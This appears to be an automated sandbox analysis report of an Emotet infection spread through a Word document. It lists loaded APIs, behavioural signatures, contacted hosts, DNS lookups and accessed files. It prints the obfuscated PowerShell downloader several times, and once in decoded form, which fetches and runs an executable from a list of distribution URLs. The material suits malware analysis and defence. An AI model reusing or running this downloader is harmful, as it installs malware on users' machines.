DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/FreeConsole
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptGenKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptDuplicateHash
DynamicLoader: CRYPTSP.dll/CryptEncrypt
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: RASAPI32.dll/RasConnectionNotificationW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: iphlpapi.DLL/GetAdaptersAddresses
DynamicLoader: DHCPCSVC.DLL/DhcpRequestParams
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: wersvc.dll/ServiceMain
DynamicLoader: wersvc.dll/SvchostPushServiceGlobals
DynamicLoader: ADVAPI32.dll/RegGetValueW
DynamicLoader: sechost.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
Performs HTTP requests potentially not found in PCAP.
url: allopizzanuit.fr:80//mm.microsoft.ms/med/event/dNhfd4yt/dNhfd4yt
Expresses interest in specific running processes
process: dafpanes.exe
process: 970.exe
Executed a very long command line or script command which may be indicative of chained commands or obfuscation
command: POwershell -e JABCAE0AMAB6ADIAdwBwAGkAPQAoACcAcABRADQAMAAnACsAJwBKAEQAVgBWACcAKQA7ACQAUQA5AG8AdQBuAEYASgBCAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAG8AOAAxAFAASQBVAHoAaAA9ACgAJwBoACcAKwAnAHQAdABwACcAKwAnADoAJwArACcALwAvAHcAdwAnACsAJwB3AC4AJwArACcAcAByAG8AdwBpAGQAbwByAC4AYwAnACsAJwBvAG0ALwBLAFkANQAnACsAJwBWAEgAcwB0ACcAKwAnAFIAJwArACcAVwBAAGgAdAB0AHAAOgAvAC8AJwArACcAYQBsACcAKwAnAHQAdQBuAHQAdQAnACsAJwB2AGEAbAAuAGMAbwBtACcAKwAnAC8AbgA0AGoAawBRAFoAVwAnACsAJwB0ACcAKwAnAEsAJwArACcAQAAnACsAJwBoAHQAdABwADoALwAvACcAKwAnAHcAbwByACcAKwAnAGQAcAByAGUAJwArACcAcwBzAC0AMgAxADkAJwArACcANwA2ADgALQA3ADEAJwArACcANgA3ADMAMgAnACsAJwAuACcAKwAnAGMAbABvAHUAZAAnACsAJwB3ACcAKwAnAGEAeQBzAGEAcAAnACsAJwBwAHMAJwArACcALgBjAG8AJwArACcAbQAvAEUAYwBVAEsAJwArACcAcABFACcAKwAnAGYAaQBMACcAKwAnAFgAJwArACcAQABoAHQAdABwADoALwAvAG0AYQB4AHQAJwArACcAcgBhACcAKwAnAGkAZAAnACsAJwBpAG4AZwByAHUAJwArACcALgA0ADMANwAuACcAKwAnAGMAbwAnACsAJwBtADEALgByAHUALwBOAGEATwAnACsAJwBuAEYAJwArACcAQwBxAE4AJwArACcAegAnACsAJwBAAGgAdAB0AHAAOgAvAC8AbQBzAGsAaAAnACsAJwBpAHMAdAAnACsAJwBvAHIAeQAuAHIAdQAnACsAJwAvAHMAQQBaAHAASgAnACsAJwBzADgAJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAQwBpAG8AVgBpAFAAPQAoACcARgB3AHoAdQBOACcAKwAnAEIARQB3ACcAKQA7ACQASwBtAE0AdwBSAEcAIAA9ACAAKAAnADkANwAnACsAJwAwACcAKQA7ACQAVQBEAFQAOQBuAEsAOQBZAD0AKAAnAEgAZAA3AGkAJwArACcAQgBwAGQAJwApADsAJABuAGsATABzAHoAcgBpADkAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEsAbQBNAHcAUgBHACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAUABrAEgAMQBkAHQARgAgAGkAbgAgACQAbwA4ADEAUABJAFUAegBoACkAewB0AHIAeQB7ACQAUQA5AG8AdQBuAEYASgBCAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFAAawBIADEAZAB0AEYALAAgACQAbgBrAEwAcwB6AHIAaQA5ACkAOwAkAE4AbAA3ADYAWAA4AEIAPQAoACcAdAAnACsAJwA2AFYARgBaAG0AJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAbgBrAEwAcwB6AHIAaQA5ACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAbgBrAEwAcwB6AHIAaQA5ADsAJABsAGsAQQBLAGsAMgA9ACgAJwB6AFMAJwArACcAMwBRAE0AJwArACcAVgAnACkAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUgBwAEgAYgBIADYAPQAoACcARwA2AGoAUgBJACcAKwAnAEQARQAnACkAOwA=
A scripting utility was executed
command: POwershell -e JABCAE0AMAB6ADIAdwBwAGkAPQAoACcAcABRADQAMAAnACsAJwBKAEQAVgBWACcAKQA7ACQAUQA5AG8AdQBuAEYASgBCAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAG8AOAAxAFAASQBVAHoAaAA9ACgAJwBoACcAKwAnAHQAdABwACcAKwAnADoAJwArACcALwAvAHcAdwAnACsAJwB3AC4AJwArACcAcAByAG8AdwBpAGQAbwByAC4AYwAnACsAJwBvAG0ALwBLAFkANQAnACsAJwBWAEgAcwB0ACcAKwAnAFIAJwArACcAVwBAAGgAdAB0AHAAOgAvAC8AJwArACcAYQBsACcAKwAnAHQAdQBuAHQAdQAnACsAJwB2AGEAbAAuAGMAbwBtACcAKwAnAC8AbgA0AGoAawBRAFoAVwAnACsAJwB0ACcAKwAnAEsAJwArACcAQAAnACsAJwBoAHQAdABwADoALwAvACcAKwAnAHcAbwByACcAKwAnAGQAcAByAGUAJwArACcAcwBzAC0AMgAxADkAJwArACcANwA2ADgALQA3ADEAJwArACcANgA3ADMAMgAnACsAJwAuACcAKwAnAGMAbABvAHUAZAAnACsAJwB3ACcAKwAnAGEAeQBzAGEAcAAnACsAJwBwAHMAJwArACcALgBjAG8AJwArACcAbQAvAEUAYwBVAEsAJwArACcAcABFACcAKwAnAGYAaQBMACcAKwAnAFgAJwArACcAQABoAHQAdABwADoALwAvAG0AYQB4AHQAJwArACcAcgBhACcAKwAnAGkAZAAnACsAJwBpAG4AZwByAHUAJwArACcALgA0ADMANwAuACcAKwAnAGMAbwAnACsAJwBtADEALgByAHUALwBOAGEATwAnACsAJwBuAEYAJwArACcAQwBxAE4AJwArACcAegAnACsAJwBAAGgAdAB0AHAAOgAvAC8AbQBzAGsAaAAnACsAJwBpAHMAdAAnACsAJwBvAHIAeQAuAHIAdQAnACsAJwAvAHMAQQBaAHAASgAnACsAJwBzADgAJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAQwBpAG8AVgBpAFAAPQAoACcARgB3AHoAdQBOACcAKwAnAEIARQB3ACcAKQA7ACQASwBtAE0AdwBSAEcAIAA9ACAAKAAnADkANwAnACsAJwAwACcAKQA7ACQAVQBEAFQAOQBuAEsAOQBZAD0AKAAnAEgAZAA3AGkAJwArACcAQgBwAGQAJwApADsAJABuAGsATABzAHoAcgBpADkAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEsAbQBNAHcAUgBHACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAUABrAEgAMQBkAHQARgAgAGkAbgAgACQAbwA4ADEAUABJAFUAegBoACkAewB0AHIAeQB7ACQAUQA5AG8AdQBuAEYASgBCAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFAAawBIADEAZAB0AEYALAAgACQAbgBrAEwAcwB6AHIAaQA5ACkAOwAkAE4AbAA3ADYAWAA4AEIAPQAoACcAdAAnACsAJwA2AFYARgBaAG0AJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAbgBrAEwAcwB6AHIAaQA5ACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAbgBrAEwAcwB6AHIAaQA5ADsAJABsAGsAQQBLAGsAMgA9ACgAJwB6AFMAJwArACcAMwBRAE0AJwArACcAVgAnACkAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUgBwAEgAYgBIADYAPQAoACcARwA2AGoAUgBJACcAKwAnAEQARQAnACkAOwA=
Uses Windows utilities for basic functionality
command: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\Servicevertrag[1].doc"
command: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\Servicevertrag[1].doc
Queries information on disks, possibly for anti-virtualization
Attempts to remove evidence of file being downloaded from the Internet
file: C:\Windows\SysWOW64\dafpanes.exe:Zone.Identifier
Behavioural detection: Transacted Hollowing
Creates or sets a registry key to a long series of bytes, possibly to store a binary or malware config
regkeyval: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\ProgramsCache
Installs itself for autorun at Windows startup
service name: dafpanes
service path: "C:\Windows\SysWOW64\dafpanes.exe"
key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dafpanes\ImagePath
data: "C:\Windows\SysWOW64\dafpanes.exe"
CAPE detected the Emotet malware family
A script or command line contains a long continuous string indicative of obfuscation
command: POwershell -e JABCAE0AMAB6ADIAdwBwAGkAPQAoACcAcABRADQAMAAnACsAJwBKAEQAVgBWACcAKQA7ACQAUQA5AG8AdQBuAEYASgBCAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAG8AOAAxAFAASQBVAHoAaAA9ACgAJwBoACcAKwAnAHQAdABwACcAKwAnADoAJwArACcALwAvAHcAdwAnACsAJwB3AC4AJwArACcAcAByAG8AdwBpAGQAbwByAC4AYwAnACsAJwBvAG0ALwBLAFkANQAnACsAJwBWAEgAcwB0ACcAKwAnAFIAJwArACcAVwBAAGgAdAB0AHAAOgAvAC8AJwArACcAYQBsACcAKwAnAHQAdQBuAHQAdQAnACsAJwB2AGEAbAAuAGMAbwBtACcAKwAnAC8AbgA0AGoAawBRAFoAVwAnACsAJwB0ACcAKwAnAEsAJwArACcAQAAnACsAJwBoAHQAdABwADoALwAvACcAKwAnAHcAbwByACcAKwAnAGQAcAByAGUAJwArACcAcwBzAC0AMgAxADkAJwArACcANwA2ADgALQA3ADEAJwArACcANgA3ADMAMgAnACsAJwAuACcAKwAnAGMAbABvAHUAZAAnACsAJwB3ACcAKwAnAGEAeQBzAGEAcAAnACsAJwBwAHMAJwArACcALgBjAG8AJwArACcAbQAvAEUAYwBVAEsAJwArACcAcABFACcAKwAnAGYAaQBMACcAKwAnAFgAJwArACcAQABoAHQAdABwADoALwAvAG0AYQB4AHQAJwArACcAcgBhACcAKwAnAGkAZAAnACsAJwBpAG4AZwByAHUAJwArACcALgA0ADMANwAuACcAKwAnAGMAbwAnACsAJwBtADEALgByAHUALwBOAGEATwAnACsAJwBuAEYAJwArACcAQwBxAE4AJwArACcAegAnACsAJwBAAGgAdAB0AHAAOgAvAC8AbQBzAGsAaAAnACsAJwBpAHMAdAAnACsAJwBvAHIAeQAuAHIAdQAnACsAJwAvAHMAQQBaAHAASgAnACsAJwBzADgAJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAQwBpAG8AVgBpAFAAPQAoACcARgB3AHoAdQBOACcAKwAnAEIARQB3ACcAKQA7ACQASwBtAE0AdwBSAEcAIAA9ACAAKAAnADkANwAnACsAJwAwACcAKQA7ACQAVQBEAFQAOQBuAEsAOQBZAD0AKAAnAEgAZAA3AGkAJwArACcAQgBwAGQAJwApADsAJABuAGsATABzAHoAcgBpADkAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEsAbQBNAHcAUgBHACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAUABrAEgAMQBkAHQARgAgAGkAbgAgACQAbwA4ADEAUABJAFUAegBoACkAewB0AHIAeQB7ACQAUQA5AG8AdQBuAEYASgBCAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFAAawBIADEAZAB0AEYALAAgACQAbgBrAEwAcwB6AHIAaQA5ACkAOwAkAE4AbAA3ADYAWAA4AEIAPQAoACcAdAAnACsAJwA2AFYARgBaAG0AJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAbgBrAEwAcwB6AHIAaQA5ACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAbgBrAEwAcwB6AHIAaQA5ADsAJABsAGsAQQBLAGsAMgA9ACgAJwB6AFMAJwArACcAMwBRAE0AJwArACcAVgAnACkAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUgBwAEgAYgBIADYAPQAoACcARwA2AGoAUgBJACcAKwAnAEQARQAnACkAOwA=
Drops a binary and executes it
binary: C:\Windows\SysWOW64\dafpanes.exe
binary: C:\Users\user\970.exe
Martian Subprocess Started By IE
ie_martian: c:\program files (x86)\microsoft office\office14\winword.exe
ie_martian: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
ie_martian: c:\users\user\970.exe
ie_martian: c:\users\user\970.exe
ie_martian: c:\windows\splwow64.exe
Attempts to modify Microsoft Office security settings
Attempts to execute suspicious powershell command arguments
command: POwershell -e JABCAE0AMAB6ADIAdwBwAGkAPQAoACcAcABRADQAMAAnACsAJwBKAEQAVgBWACcAKQA7ACQAUQA5AG8AdQBuAEYASgBCAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAG8AOAAxAFAASQBVAHoAaAA9ACgAJwBoACcAKwAnAHQAdABwACcAKwAnADoAJwArACcALwAvAHcAdwAnACsAJwB3AC4AJwArACcAcAByAG8AdwBpAGQAbwByAC4AYwAnACsAJwBvAG0ALwBLAFkANQAnACsAJwBWAEgAcwB0ACcAKwAnAFIAJwArACcAVwBAAGgAdAB0AHAAOgAvAC8AJwArACcAYQBsACcAKwAnAHQAdQBuAHQAdQAnACsAJwB2AGEAbAAuAGMAbwBtACcAKwAnAC8AbgA0AGoAawBRAFoAVwAnACsAJwB0ACcAKwAnAEsAJwArACcAQAAnACsAJwBoAHQAdABwADoALwAvACcAKwAnAHcAbwByACcAKwAnAGQAcAByAGUAJwArACcAcwBzAC0AMgAxADkAJwArACcANwA2ADgALQA3ADEAJwArACcANgA3ADMAMgAnACsAJwAuACcAKwAnAGMAbABvAHUAZAAnACsAJwB3ACcAKwAnAGEAeQBzAGEAcAAnACsAJwBwAHMAJwArACcALgBjAG8AJwArACcAbQAvAEUAYwBVAEsAJwArACcAcABFACcAKwAnAGYAaQBMACcAKwAnAFgAJwArACcAQABoAHQAdABwADoALwAvAG0AYQB4AHQAJwArACcAcgBhACcAKwAnAGkAZAAnACsAJwBpAG4AZwByAHUAJwArACcALgA0ADMANwAuACcAKwAnAGMAbwAnACsAJwBtADEALgByAHUALwBOAGEATwAnACsAJwBuAEYAJwArACcAQwBxAE4AJwArACcAegAnACsAJwBAAGgAdAB0AHAAOgAvAC8AbQBzAGsAaAAnACsAJwBpAHMAdAAnACsAJwBvAHIAeQAuAHIAdQAnACsAJwAvAHMAQQBaAHAASgAnACsAJwBzADgAJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAQwBpAG8AVgBpAFAAPQAoACcARgB3AHoAdQBOACcAKwAnAEIARQB3ACcAKQA7ACQASwBtAE0AdwBSAEcAIAA9ACAAKAAnADkANwAnACsAJwAwACcAKQA7ACQAVQBEAFQAOQBuAEsAOQBZAD0AKAAnAEgAZAA3AGkAJwArACcAQgBwAGQAJwApADsAJABuAGsATABzAHoAcgBpADkAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEsAbQBNAHcAUgBHACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAUABrAEgAMQBkAHQARgAgAGkAbgAgACQAbwA4ADEAUABJAFUAegBoACkAewB0AHIAeQB7ACQAUQA5AG8AdQBuAEYASgBCAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFAAawBIADEAZAB0AEYALAAgACQAbgBrAEwAcwB6AHIAaQA5ACkAOwAkAE4AbAA3ADYAWAA4AEIAPQAoACcAdAAnACsAJwA2AFYARgBaAG0AJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAbgBrAEwAcwB6AHIAaQA5ACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAbgBrAEwAcwB6AHIAaQA5ADsAJABsAGsAQQBLAGsAMgA9ACgAJwB6AFMAJwArACcAMwBRAE0AJwArACcAVgAnACkAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUgBwAEgAYgBIADYAPQAoACcARwA2AGoAUgBJACcAKwAnAEQARQAnACkAOwA=
decoded_base64_string: $BM0z2wpi=('pQ40'+'JDVV');$Q9ounFJB=new-object Net.WebClient;$o81PIUzh=('h'+'ttp'+':'+'//ww'+'w.'+'prowidor.c'+'om/KY5'+'VHst'+'R'+'W@http://'+'al'+'tuntu'+'val.com'+'/n4jkQZW'+'t'+'K'+'@'+'http://'+'wor'+'dpre'+'ss-219'+'768-71'+'6732'+'.'+'cloud'+'w'+'aysap'+'ps'+'.co'+'m/EcUK'+'pE'+'fiL'+'X'+'@http://maxt'+'ra'+'id'+'ingru'+'.437.'+'co'+'m1.ru/NaO'+'nF'+'CqN'+'z'+'@http://mskh'+'ist'+'ory.ru'+'/sAZpJ'+'s8').Split('@');$CioViP=('FwzuN'+'BEw');$KmMwRG = ('97'+'0');$UDT9nK9Y=('Hd7i'+'Bpd');$nkLszri9=$env:userprofile+'\'+$KmMwRG+('.e'+'xe');foreach($PkH1dtF in $o81PIUzh){try{$Q9ounFJB.DownloadFile($PkH1dtF, $nkLszri9);$Nl76X8B=('t'+'6VFZm');If ((Get-Item $nkLszri9).length -ge 40000) {Invoke-Item $nkLszri9;$lkAKk2=('zS'+'3QM'+'V');break;}}catch{}}$RpHbH6=('G6jRI'+'DE');
Uses suspicious command line tools or Windows utilities
command: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\Servicevertrag[1].doc"

Screenshots


Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
N 8.253.133.120 [VT] United States
Y 71.174.233.71 [VT] United States
N 65.52.98.231 [VT] United States
Y 64.32.70.194 [VT] Dominican Republic
N 23.49.13.56 [VT] United States
N 204.79.197.200 [VT] United States
Y 200.110.85.138 [VT] Ecuador
Y 187.131.137.216 [VT] Mexico
N 18.221.60.39 [VT] United States
Y 174.84.250.37 [VT] United States
N 145.239.74.67 [VT] France
N 104.112.180.173 [VT] United States

DNS

Name Response Post-Analysis Lookup
www.bing.com [VT] CNAME a-0001.a-afdentry.net.trafficmanager.net [VT]
A 204.79.197.200 [VT]
CNAME a-0001.a-msedge.net [VT]
A 13.107.21.200 [VT]
allopizzanuit.fr [VT] A 145.239.74.67 [VT]
www.prowidor.com [VT] A 18.221.60.39 [VT]
CNAME prowidor.com [VT]
go.microsoft.com [VT] CNAME go.microsoft.com.edgekey.net [VT]
A 104.112.180.173 [VT]
CNAME e11290.dspg.akamaiedge.net [VT]
activation.sls.microsoft.com [VT] CNAME activation.sls.trafficmanager.net [VT]
A 65.52.98.231 [VT]
www.microsoft.com [VT] CNAME www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net [VT]
CNAME e13678.dspb.akamaiedge.net [VT]
CNAME www.microsoft.com-c-3.edgekey.net [VT]
A 23.49.13.56 [VT]
www.download.windowsupdate.com [VT] A 8.253.133.120 [VT]
A 8.253.133.249 [VT]
A 8.252.194.254 [VT]
CNAME 2-01-3cf7-0009.cdx.cedexis.net [VT]
A 8.253.151.120 [VT]
A 8.252.43.126 [VT]
CNAME fg.download.windowsupdate.com.c.footprint.net [VT]

Summary

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E84ED3A4-2E0C-11E9-8662-000C2940B9FB}.dat
C:\Program Files (x86)\Internet Explorer\ieproxy.dll
C:\Users\user\AppData\Local\Temp\~DF382AE8405A18B581.TMP
C:\Windows\SysWOW64\propsys.dll
C:\Windows\sysnative\propsys.dll
C:\Windows\System32\url.dll
C:\Users\user\Favorites\Links
C:\
C:\Users
C:\Users\user\AppData\Local\Microsoft\Windows\Caches
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db
\??\MountPointManager
C:\Users\desktop.ini
C:\Users\user
C:\Users\user\Favorites
C:\Users\user\Favorites\desktop.ini
C:\Users\user\Desktop\desktop.ini
C:\Users\user\Favorites\Links\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\frameiconcache.dat
C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
C:\Windows\SysWOW64\en-US\MSCTF.dll.mui
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E84ED3A5-2E0C-11E9-8662-000C2940B9FB}.dat
C:\Users\user\AppData\Local\Temp\~DF56FB948D142E1A7A.TMP
C:\Users\user\Favorites\Links\Web Slice Gallery.url
C:\Users\user\AppData\Local\Microsoft\Feeds
C:\Users\user\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~
C:\Users\user\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~
C:\Windows\SysWOW64\ieframe.dll
C:\Windows\SysWOW64\stdole2.tlb
C:\Program Files (x86)\Internet Explorer\url.dll
C:\Users\user\Desktop\url.dll
C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\
C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\ProgramData\Microsoft\Network\Connections\Pbk\*.pbk
C:\Windows\System32\ras\*.pbk
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\*.pbk
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\favicon[1].ico
C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\28c8b86deab549a1.customDestinations-ms
\Device\KsecDD
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Program Files (x86)\Internet Explorer\IEShims.dll
C:\Windows\SysWOW64\shell32.dll
C:\Program Files (x86)\Internet Explorer\sqmapi.dll
C:\Users\user\AppData\Roaming\Microsoft\Windows\IETldCache\
C:\Users\user\AppData\Roaming\Microsoft\Windows\IETldCache\index.dat
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\index.dat
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\desktop.ini
C:\Windows\Fonts\staticcache.dat
C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
C:\Windows
C:\Windows\winsxs
C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
C:\Program Files (x86)\Internet Explorer\iexplore.exe.Local\
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc
C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL
C:\Windows\AppPatch\sysmain.sdb
C:\Program Files (x86)\Microsoft Office\Office14\
C:\Program Files (x86)
C:\Program Files (x86)\Microsoft Office
C:\Program Files (x86)\Microsoft Office\Office14
C:\Program Files (x86)\Microsoft Office\Office14\*.*
C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
C:\Program Files (x86)\Java\jre7\bin\java.exe
C:\Program Files (x86)\Java\jre7\bin\client\jvm.dll
C:\Program Files (x86)\Java\jre7\bin\server\jvm.dll
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\Servicevertrag[1].doc
C:\Windows\SysWOW64\urlmon.dll
C:\Windows\SysWOW64
\??\PIPE\samr
C:\DosDevices\pipe\
C:\Windows\winsxs\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9
C:\Windows\winsxs\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9\comctl32.dll.mui
C:\Windows\Installer\{90140000-003D-0000-0000-0000000FF1CE}\wordicon.exe
C:\Users\user\AppData
C:\Users\user\AppData\Local
C:\Users\user\AppData\Local\Microsoft\Windows
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
C:\Program Files (x86)\Windows Defender\MpClient.dll
C:\Program Files (x86)\Windows Defender\MsMpLics.dll
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\Servicevertrag[1].doc:Zone.Identifier
C:\Users\user\Searches
C:\Users\user\Searches\desktop.ini
C:\Users\user\Videos
C:\Users\user\Videos\desktop.ini
C:\Users\user\Pictures
C:\Users\user\Pictures\desktop.ini
C:\Users\user\Desktop
C:\Users\user\Contacts
C:\Users\user\Contacts\desktop.ini
C:\Users\user\Music
C:\Users\user\Music\desktop.ini
C:\Users\user\Downloads
C:\Users\user\Downloads\desktop.ini
C:\Users\user\Documents
C:\Users\user\Documents\desktop.ini
C:\Users\user\Links
C:\Users\user\Links\desktop.ini
C:\Users\user\Saved Games
C:\Users\user\Saved Games\desktop.ini
C:\Windows\System32\shdocvw.dll
C:\Windows\System32\
C:\Windows\SysWOW64\shdocvw.dll
C:\Windows\System32
C:\Windows\System32\*.*
C:\Windows\System32\en-US\shdocvw.dll.mui
C:\Program Files (x86)\Common Files\Microsoft Shared\Filters\odffilt.dll
C:\Program Files (x86)\Microsoft Office\Office14\GKWord.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSO.DLL
C:\Program Files (x86)\Microsoft Office\Office14\OUTLFLTR.DLL
